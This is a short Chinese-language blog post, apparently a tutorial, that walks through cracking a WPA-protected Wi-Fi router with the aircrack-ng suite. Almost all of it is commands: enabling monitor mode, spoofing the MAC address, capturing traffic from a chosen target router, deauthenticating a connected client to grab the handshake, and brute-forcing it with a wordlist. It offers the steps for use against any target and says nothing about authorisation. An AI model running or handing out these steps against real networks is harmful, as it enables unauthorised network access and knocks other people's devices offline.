破解wpa加密路由器的原理不同于破解wep加密路由器,只能通过暴力破解获取。

但是获取握手keystream的原理差不多

首先杀死可能会和破解冲突的进程 airmon-ng check kill

开启网卡monitor模式 airmon-ng start wlan0

修改mac之前先停掉网卡 ifconfig wlan0mon down,修改mac macchanger -m 00:11:22:33:44:55 wlan0mon,再开启网卡 ifconfig wlan0mon up

查看网卡工作的信道 iwlist wlan0mon channel

修改信道之前先停掉 airmon-ng stop wlan0mon,开启时加上信道号,airmon-ng start wlan0 <信道号> , 再查看工作信道就会发现已更改。

开始侦听airodump-ng wlan0mon 按"A"键切换查看,在大量的信息中挑选一个路由器作为目标 airodump-ng -c <信道号> --bssid <目标路由器mac> -w <生成文件名> 网卡

无线渗透wpa加密路由器

这里显示的是目标路由器下连接的设备,选择其中的一个设备进行断网攻击已获得handshak

aireplay-ng -0 <攻击次数> -a <路由器mac> -c <客户端mac> <网卡名>

 无线渗透wpa加密路由器

并在当前文件夹下生成一个.cap文件

开始破解 aircrack-ng -w <字典文件> wpa-01.cap

 

相关文章:

  • 2021-12-29
  • 2021-12-06
  • 2021-06-05
  • 2021-12-09
  • 2021-12-06
  • 2021-05-27
  • 2022-12-23
  • 2022-12-23
猜你喜欢
  • 2021-12-30
  • 2021-08-19
  • 2021-06-22
  • 2021-09-26
  • 2021-11-27
  • 2022-12-23
  • 2022-12-23
相关资源
相似解决方案